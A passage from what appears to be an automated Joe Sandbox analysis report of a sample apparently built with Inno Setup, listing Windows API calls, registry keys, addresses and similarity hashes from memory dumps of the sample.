• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Menu$Append$System
• String ID:
• API String ID: 1489644407-0
• Opcode ID: 15f49a51bc99aadf11e624829d5c93e52e60f789ff86a8cde7e3ee935291695d
• Instruction ID: e529b759dd7a2e51a8c3bcc96a7d172377ee55af5fc7f1ed5a89e34a1d2f7138
• Opcode Fuzzy Hash: 15f49a51bc99aadf11e624829d5c93e52e60f789ff86a8cde7e3ee935291695d
• Instruction Fuzzy Hash: 0A31A170B047406AD711FBB59CC2BAA3AA49F51318F54857FB9049B3D3CA7C9809C79D
Uniqueness
Uniqueness Score: -1.00%

APIs
• 74D41520.VERSION(00000000,?,?,?,004917BA), ref: 00450EB4
• 74D41500.VERSION(00000000,?,00000000,?,00000000,00450F2F,?,00000000,?,?,?,004917BA), ref: 00450EE1
• 74D41540.VERSION(?,00450F58,?,?,00000000,?,00000000,?,00000000,00450F2F,?,00000000,?,?,?,004917BA), ref: 00450EFB
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: D41500D41520D41540
• String ID:
• API String ID: 2153611984-0
• Opcode ID: 7772eee873665419e592b8f0c908b8e340ebe2ab536abffed1c380b4fbd37808
• Instruction ID: 38752d589292965b455f679da5e662606514df90b198f4031c48c0776fd97eb8
• Opcode Fuzzy Hash: 7772eee873665419e592b8f0c908b8e340ebe2ab536abffed1c380b4fbd37808
• Instruction Fuzzy Hash: 3F21A736A04208AFDB11DAA98C41DAFB7FCEB49315F554076FC04E3382D6799E04C769
Uniqueness
Uniqueness Score: -1.00%

APIs
• 73A1A570.USER32(00000000,?,00000000,00000000,0044AD21,?,0047CB6F,?,?), ref: 0044AC95
• SelectObject.GDI32(?,00000000), ref: 0044ACB8
• 73A1A480.USER32(00000000,?,0044ACF8,00000000,0044ACF1,?,00000000,?,00000000,00000000,0044AD21,?,0047CB6F,?,?), ref: 0044ACEB
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: A480A570ObjectSelect
• String ID:
• API String ID: 1230475511-0
• Opcode ID: 3e82d226e837a8f6b7b2e24a5f41b75efb5a851a96c6751f784262e8f2c57c71
• Instruction ID: 433fe99046f9b8d1d8bc89e2463d1e9b45a303d4827d396566f55289c028a56b
• Opcode Fuzzy Hash: 3e82d226e837a8f6b7b2e24a5f41b75efb5a851a96c6751f784262e8f2c57c71
• Instruction Fuzzy Hash: 0B21A470E44248AFEB01DFA5C885B9EBBB9EB49304F41847AF500A7681D77C9950CB5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9E0,?,0047CB6F,?,?), ref: 0044A9B2
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A9C5
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9F9
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID:
• API String ID: 65125430-0
• Opcode ID: c13eedb90b8a925426525e5fed0b4ef7f0e424fa92bc79367e1c17be0fc738c0
• Instruction ID: 95435d2b4f75e5b2944811cec87d15154efa184d0a126f2c6d3e2a7360284236
• Opcode Fuzzy Hash: c13eedb90b8a925426525e5fed0b4ef7f0e424fa92bc79367e1c17be0fc738c0
• Instruction Fuzzy Hash: 101108B27406047FEB10DBAA8C82D6FB7ECDB49724F10413BF504E72D0C6389E418669
Uniqueness
Uniqueness Score: -1.00%

APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424382
• TranslateMessage.USER32(?), ref: 004243FF
• DispatchMessageA.USER32(?), ref: 00424409
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
• Opcode ID: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
• Instruction ID: aef1b0206ccdbb2aa8587e86ea6dacd49c82d9c27d6d10fa8c02d352bba97142
• Opcode Fuzzy Hash: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
• Instruction Fuzzy Hash: 6F11543030432056DA20E665A94179B73D4DFC1B44F80886EF9DD97382D77D9D4987AA
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetPropA.USER32(00000000,00000000), ref: 004165DA
• SetPropA.USER32(00000000,00000000), ref: 004165EF
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 00416616
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
• Opcode ID: 5c6b3d06cb009850df356c260b5fd7b3460cba3a8d418ad6d76e3dbffd8df0bd
• Instruction ID: a4591c201cec785823d6f09090f19fa17713029ec43dd267bc08175e274880c9
• Opcode Fuzzy Hash: 5c6b3d06cb009850df356c260b5fd7b3460cba3a8d418ad6d76e3dbffd8df0bd
• Instruction Fuzzy Hash: 3EF0B271701210BBD710AB999C85FA632DCAB49715F160576BE09EF286C778DC41C7A8
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(?), ref: 0041EDD4
• IsWindowEnabled.USER32(?), ref: 0041EDDE
• EnableWindow.USER32(?,00000000), ref: 0041EE04
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Window$EnableEnabledVisible
• String ID:
• API String ID: 3234591441-0
• Opcode ID: 09ca1b9a0e147f9e3f9c02f0c1b7de6c858dacd1e672d107cae65fab239c05be
• Instruction ID: 54ed9e8c30520215bbb9e32f791a183ef62373b3d5af12756bdb3ea3c07ca3da
• Opcode Fuzzy Hash: 09ca1b9a0e147f9e3f9c02f0c1b7de6c858dacd1e672d107cae65fab239c05be
• Instruction Fuzzy Hash: 8EE0E5B81003006AD710AF27DC85A57B69CBB55314F55843BAC0597693E63ED9408AB8
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalHandle.KERNEL32 ref: 004062A1
• GlobalUnWire.KERNEL32(00000000), ref: 004062A8
• GlobalFree.KERNEL32(00000000), ref: 004062AD
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Global$FreeHandleWire
• String ID:
• API String ID: 318822183-0
• Opcode ID: 811b5650058efd060b0480522622cea17f29fa46ba8acc2a698c355084a7e242
• Instruction ID: 232b5a29dca1329e6ee8fbf729e049d74cb9239d0bdd557acda0a77be920d3a5
• Opcode Fuzzy Hash: 811b5650058efd060b0480522622cea17f29fa46ba8acc2a698c355084a7e242
• Instruction Fuzzy Hash: 73A001C4804A04A9D80072B2080BA2F244CD8413283D0496B7440B2183883C8C40593A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040867A), ref: 00408563
  • Part of subcall function 00406D54: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406D71
  • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
Strings
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID: D)I
• API String ID: 1658689577-3281296081
• Opcode ID: 9103b9db00703e184e34eb4656f7bfd6b4db387a392b2c8979318a7ca80b884a
• Instruction ID: f58fcf4e1761da05b427c157ba45b790d79041d0860886b9734fa9e18fdbd457
• Opcode Fuzzy Hash: 9103b9db00703e184e34eb4656f7bfd6b4db387a392b2c8979318a7ca80b884a
• Instruction Fuzzy Hash: B4316575E00109ABCF01EF95C8819DEB779FF84318F158577E815BB245E738AE058B94
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetActiveWindow.USER32(?), ref: 0047CBF8
Strings
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: ActiveWindow
• String ID: InitializeWizard
• API String ID: 2558294473-2356795471
• Opcode ID: 7279c2e58fd28a7885900cae1b936918ab34a155763bf2546a03f5746716a5ae
• Instruction ID: 3ab1797be40594411df6c685a440b4787fcf783bea31960e6df624453c322c8c
• Opcode Fuzzy Hash: 7279c2e58fd28a7885900cae1b936918ab34a155763bf2546a03f5746716a5ae
• Instruction Fuzzy Hash: C011CE70208244AFD715EB6AFC92F4537A8E355328F2084BBF418CB3A1DB79A801CB0D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,004772FA,00000000,00477434), ref: 004770F9
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 004770C9
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: 71c6e6b3dc286b70a3593d79c622b1ea36892c5bd16880d74348932d8ba95855
• Instruction ID: 04cc745cd351e58eb0cff21a747400ae09bf373c4f85ab843473da0d03261e2e
• Opcode Fuzzy Hash: 71c6e6b3dc286b70a3593d79c622b1ea36892c5bd16880d74348932d8ba95855
• Instruction Fuzzy Hash: 7BF0A7317081246BDA00A65E9C42BAFA7DDCB84758FA0443BF508EB343D9BD9E0243AC
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,004950AC,?,0046AB7B,?,00000000,0046B003,?,_is1), ref: 0046A89B
Strings
• Inno Setup: Setup Version, xrefs: 0046A899
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Value
• String ID: Inno Setup: Setup Version
• API String ID: 3702945584-4166306022
• Opcode ID: 7c674279de04d575b201b80dd7d27308a15b9831806c0875c4ebb08a754ba4da
• Instruction ID: 9f8d8e903d06484b85b597de6eb29e8b1ae332426fce2fadbe533b90cf17b58b
• Opcode Fuzzy Hash: 7c674279de04d575b201b80dd7d27308a15b9831806c0875c4ebb08a754ba4da
• Instruction Fuzzy Hash: 38E06D713016043FD710AA2A9C85F5BBADCDF98366F10403AB908EB392D978DD0186A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,004950AC,00000004,00000001,?,0046AF1B,?,?,00000000,0046B003,?,_is1,?), ref: 0046A8FB
Strings
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Value
• String ID: NoModify
• API String ID: 3702945584-1699962838
• Opcode ID: 7eb7c7e6cb67b214b7fefeacd9b811682ceea12d2a12e6196767648bea257352
• Instruction ID: 3fa285531c513fb9f209240a3363212c8c226bbd47a131a1ec4299046806267d
• Opcode Fuzzy Hash: 7eb7c7e6cb67b214b7fefeacd9b811682ceea12d2a12e6196767648bea257352
• Instruction Fuzzy Hash: DAE04FB0640704BFEB04DB55CD4AF6B77ACDB48710F104059BA08EB291EA74FE00CA69
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
Strings
• System\CurrentControlSet\Control\Windows, xrefs: 0042DC6E
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Open
• String ID: System\CurrentControlSet\Control\Windows
• API String ID: 71445658-1109719901
• Opcode ID: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
• Instruction ID: fabb803f5ff523eeab3b7a035bb747b9213277980d9d81731b2bf545c5070290
• Opcode Fuzzy Hash: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
• Instruction Fuzzy Hash: EDD0C772910128BBDB10DA89DC41DF7775DDB59760F54401AFD0497141C1B4EC5197F4
Uniqueness
Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DA74
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DAE4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID:
                                                                          • API String ID: 3660427363-0
                                                                          • Opcode ID: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                          • Instruction ID: de7305fe23da407263f6a21fe748e6d6d926aae016943a7179aec9e2dd5a457b
                                                                          • Opcode Fuzzy Hash: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                          • Instruction Fuzzy Hash: 4F417171E04129AFDF10DF91D891BAFBBB8EB01704F918466E810B7240D778BE04CB99
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DD8C
                                                                          • RegCloseKey.ADVAPI32(?,0042DDFD,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DDF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1332880857-0
                                                                          • Opcode ID: ea84ca3d7e1f6c1c0b6d56cbe1a01e231d4ee03520b80429029a0b90aff89d77
                                                                          • Instruction ID: 8750a336c872ea863c0e9609c16c650b162605484654b044cfb671e23e380797
                                                                          • Opcode Fuzzy Hash: ea84ca3d7e1f6c1c0b6d56cbe1a01e231d4ee03520b80429029a0b90aff89d77
                                                                          • Instruction Fuzzy Hash: D031B370F046496FDB14DFA6DC42BAFBBB9EB48304F90407BE400F7281D6785A01CA29
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AF52
                                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B0AF,00000000,0040B0C7,?,?,?,00000000), ref: 0040AF63
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindFree
                                                                          • String ID:
                                                                          • API String ID: 4097029671-0
                                                                          • Opcode ID: 4a3d0bcc4be787f81902a26f6412a4ca12b3141026bcd8183d147badd2f1fda4
                                                                          • Instruction ID: b3b639975b52532719f451a44c4ce50818db8a334c2074d500fa8c69fc4aeb59
                                                                          • Opcode Fuzzy Hash: 4a3d0bcc4be787f81902a26f6412a4ca12b3141026bcd8183d147badd2f1fda4
                                                                          • Instruction Fuzzy Hash: 4E01F2B1704300AFE710EF69DC92E1A77EDDB897187118076FA00EB3D0DA79AC11966A
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                          • 73A25940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A25940CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2655091166-0
                                                                          • Opcode ID: 45cd012e44c1ea1951e100f055d23ec2744ac20cc53ecf2ddac386a9fa93ee21
                                                                          • Instruction ID: 841e8cf9215cf9d4f8ef4a1d843f5d233028b5bef1f8e83ef409b09beadc9532
                                                                          • Opcode Fuzzy Hash: 45cd012e44c1ea1951e100f055d23ec2744ac20cc53ecf2ddac386a9fa93ee21
                                                                          • Instruction Fuzzy Hash: 6F015B78A04704BFD701CF66EC11956BBE8E78E720B22887BE804D36A0E6385A10DE18
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00451646
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0045166C), ref: 0045164E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastMove
                                                                          • String ID:
                                                                          • API String ID: 55378915-0
                                                                          • Opcode ID: c0091c7478651bb023fdc3e57b8347735b5c978529b19831f608ec334460ef2a
                                                                          • Instruction ID: 57412c2de2bde2b2a9805fafeac613dae152aa12b64c6f91c1867b3f37f776c5
                                                                          • Opcode Fuzzy Hash: c0091c7478651bb023fdc3e57b8347735b5c978529b19831f608ec334460ef2a
                                                                          • Instruction Fuzzy Hash: BF01FE71B046446BCB10DF795C4159EB7ECDB48715750457BFC04E3752D6784E04855C
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451153), ref: 0045112D
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00451153), ref: 00451135
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 9df6799d2deb5604f29dc944684a2a8f5f943dbd13ec3aef100c12e22da0ad7e
                                                                          • Instruction ID: 2e99f9ab552fbc56df806c3ed4a11eaf09234a16047ee46c2fb58af4c34436b5
                                                                          • Opcode Fuzzy Hash: 9df6799d2deb5604f29dc944684a2a8f5f943dbd13ec3aef100c12e22da0ad7e
                                                                          • Instruction Fuzzy Hash: F1F02871A44604ABCB00DFB5AC42A9EB7E8DB0D715B1145F7FD04E3792E6394E048598
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,004512E9,?,-00000001,?), ref: 004512C3
                                                                          • GetLastError.KERNEL32(00000000,00000000,004512E9,?,-00000001,?), ref: 004512CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 2018770650-0
                                                                          • Opcode ID: f8db7b56bf8a9a54d59ee2d7b5184a4b5376af573ae6214083b0e3b1e2c70d75
                                                                          • Instruction ID: bd8feaa310c53350912bac505fe5cd46c6aff24ad7297d0b96d1d9052aedfe22
                                                                          • Opcode Fuzzy Hash: f8db7b56bf8a9a54d59ee2d7b5184a4b5376af573ae6214083b0e3b1e2c70d75
                                                                          • Instruction Fuzzy Hash: 12F0C871E04608ABCF00DFB59C4259EB7ECDB48715B5085F7FC04E3652E6385E14859C
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,004514C3,?,?,00000000), ref: 0045149D
                                                                          • GetLastError.KERNEL32(00000000,00000000,004514C3,?,?,00000000), ref: 004514A5
                                                                          Memory Dump Source
